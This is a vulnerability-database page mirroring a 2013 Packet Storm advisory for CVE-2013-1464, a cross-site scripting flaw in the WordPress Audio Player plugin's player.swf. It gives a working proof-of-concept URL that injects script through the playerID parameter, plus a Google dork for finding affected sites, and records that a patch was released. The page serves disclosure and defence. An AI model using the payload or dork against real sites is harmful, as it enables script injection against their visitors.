Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormHipPACKETSTORM:120129
HistoryFeb 07, 2013 - 12:00 a.m.

WordPress Audio Player SWF Cross Site Scripting

2013-02-0700:00:00
hip
packetstormsecurity.com
26

0.008 Low

EPSS

Percentile

80.0%

JSON
`# Exploit Title: Wordpress Audio Player Plugin XSS in SWF  
# Release Date: 31/01/13  
# Author: hip [Insight-Labs]  
# Contact: [email protected] | Website: http://insight-labs.org  
# Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip  
# Vendor Homepage: http://wpaudioplayer.com/  
# Tested on: XPsp3  
# Affected version: 2.0.4.6 before  
# Google Dork: inurl:/wp-content/plugins/audio-player/  
#Ref:CVE-2013-1464  
-----------------------------------------------------------------------------------------------------------------------  
# Introduction:  
Audio Player is a highly configurable but simple mp3 player for all your audio needs.  
-------------------------------------------------------------------------------------------------------------------------  
# XSS - Proof Of Concept:  
  
vulnerable path:  
/wp-content/plugins/audio-player/assets/player.swf  
vulnerabile parameter:playerID  
  
POC:  
/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}//  
  
-------------------------------------------------------------------------------------------------------------------------  
------------  
Patch:  
------------  
-- Vendor was notified on the 23/01/2013  
-- Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug  
-------------------------------------------------------------------------------------------------------------------------   
`

Related

openvas 3
nessus 2
prion 1
cve 1
debian 1
cvelist 1
securityvulns 2
wpvulndb 1
ubuntucve 1
typo3 2
freebsd 1
openvas
openvas
Debian Security Advisory DSA 2772-1 (typo3-src - cross-site scripting)
2013-10-10 00:00:00
Debian: Security Advisory (DSA-2772-1)
2013-10-09 00:00:00
TYPO3 Flowplayer Cross Site Scripting Vulnerability
2014-01-02 00:00:00
nessus
nessus
Debian DSA-2772-1 : typo3-src - XSS
2013-10-11 00:00:00
FreeBSD : typo3 -- Multiple vulnerabilities in TYPO3 Core (e6839625-fdfa-11e2-9430-20cf30e32f6d)
2013-08-06 00:00:00
prion
prion
Cross site scripting
2013-02-07 05:56:00
cve
cve
CVE-2013-1464
2013-02-07 05:56:00
debian
debian
[SECURITY] [DSA 2772-1] typo3-src security update
2013-10-10 14:22:23
cvelist
cvelist
CVE-2013-1464
2013-02-07 02:00:00
securityvulns
securityvulns
[CVE-2013-1464]Wordpress Audio Player Plugin XSS in SWF‏‏
2013-02-11 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2013-02-11 00:00:00
wpvulndb
wpvulndb
Audio Player - player.swf playerID Parameter XSS
2014-08-01 10:58:57
ubuntucve
ubuntucve
CVE-2013-1464
2013-02-07 00:00:00
typo3
typo3
Cross-Site Scripting in news
2014-06-03 00:00:00
Cross-Site Scripting and Remote Code Execution Vulnerability in TYPO3 Core
2013-07-30 00:00:00
freebsd
freebsd
typo3 -- Multiple vulnerabilities in TYPO3 Core
2013-07-30 00:00:00

0.008 Low

EPSS

Percentile

80.0%

JSON
Related for PACKETSTORM:120129
openvas3nessus2prion1cve1debian1cvelist1securityvulns2wpvulndb1ubuntucve1typo32freebsd1